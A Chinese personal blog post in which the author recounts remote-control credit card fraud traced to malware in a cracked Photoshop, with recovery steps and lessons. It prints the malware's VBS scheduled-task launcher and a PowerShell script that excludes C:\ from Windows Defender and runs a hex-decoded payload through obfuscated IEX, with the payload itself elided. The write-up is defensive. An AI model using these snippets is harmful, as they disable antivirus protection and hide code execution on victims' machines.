记一次远程控制的信用卡盗刷

先不许笑，看完再笑。

沃趣，黑客

今天，我在看完 Xbox Games Showcase 后如往常一样的锁了屏幕+回床上休息。迷迷蒙蒙中感觉手机震动了几下子，拿起一看，有一条 $839 的 Pyapal 支付信息，收款商是 Kiwi.com 。然后甚至收到了 Gmail 的机票订单确认邮件，显示订了一张第二天从瑞典哥德堡前往土耳其的机票，我：？？？？

马上起了床打开电脑，好家伙，两个 AnyDesk （一款远程操控软件）的窗口正在运行，并且黑客成功的（在我的眼皮子底下）登陆了我的 Gmail 并删除了订单确认邮件。看到我返回了电脑他马上断开了链接遁走了。

上网千万条，被黑第一条

拔你网线！

被黑第二条：NMD 这么多钱能不能追回来

账单显示是 *PAYPAL KIWI 收的款，说明黑客是使用的 Paypal 免密支付，并成功使用我本机的登录/账单信息付的款，于是我

首先提交了 Paypal 的 dispute transaction，需要等待一段时间得到结果。
打电话给信用卡公司标记这个 Transaction 为 Fraud，拒绝扣款。信用卡公司建议我申请 Unlink with Paypal Wallet 并更换新卡。
登陆了 Kiwi.com 并取消了订单，但是由于是 24h 内的机票无法获得退款。（退不了款你用黑卡买机票的也别想成功坐上飞机。）

能不能追的回来不太清楚，我感觉问题有点大，很可能这次要交学费了。

排查一哈，怎么就突然远程控制了

检查过 Windows Defender 之后，发现整个 C:\ 都被加入了例外列表，更神奇的是，即便删除后也会每两分钟自动加回来，很神秘。

经过查询，有一个定时的任务计划每隔两分钟运行一次：

其中的这个 vbs 文件每个两分钟运行一次，内容为

basic

on error resume next
Set objShell = CreateObject("Wscript.Shell")
on error resume next
objShell.Run("Powershell -ExecutionPolicy Bypass $a='ReadAllText';$T='C:\Users\Public\IObitUnlocker\Report.ps1';IEx([IO.File]::$a($T))"),0

使用 Powershell 运行一个脚本，功能是将 C:\ 添加到 Windows Defender 的排除列表里：

try{
Add-MpPreference -ExclusionPath  C:\
}catch{}

$HH1 = '...'
$HxB = '...'
$HxBB = $HxB -split ' ' |ForEach-Object {[char][byte]"0x$_"}
$HxBBB = $HxBB -join ''
&('I'+'EX') $HxBBB

后面的 $HH1 和 $HxB 估计是提权的命令，编码的是二进制文件，解码后是利用 IEX 命令反射了某个 .net 的程序运行了远程的脚本。

于是，如果是像我一样的电脑“裸奔”玩家，就无法检测到 C 盘内的恶意软件了，甚至删除后也每两分钟都被重置。之后估计就是黑客在远程脚本里传了一个 Anydesk 便携版到 %appdata%，并趁我不在电脑前时操纵电脑进行 Paypal 免密支付了。

缘起

通过查看计划任务的添加时间，不难发现添加时间是 2023/05/03，查询当日的所下载软件，有这么一条吸引了我的注意：

对的，当天为了体验 Photoshop 中的 SD 插件，我从某不知名 PT 站下载了破解版的最新 Photoshop，然后秉承着破解版程序杀毒软件误报很正常的侥幸心理添加了信任并安装，于是，这份侥幸心理终于在今日我呼呼大睡时带来了 $839 的损失。

然而正版 PhotoShop 多少钱呢？

缘落

删除了计划任务、PowerShell 脚本和破解版 Photoshop。
买了 Mcafee 两年订阅，并进行了全盘查杀。
关闭了远程协助功能。
将相关文件上传给了相关病毒/恶意脚本研究机构。
等待 Paypal / Chase 公司的回复。

给其他人的教训

Windows Defender 可以通过简单的命令添加排除列表，约等于裸奔，请知晓这一点并针对不知名来源的报毒软件多加警惕。
Paypal 一旦开启了免密支付的话一定要添加二级认证，因为这种情况完全属于你的日常环境。
不要下载破解版软件，哪怕只是用来测试简单的 Stable Diffusion 插件画涩图。

Bluefissure's Blog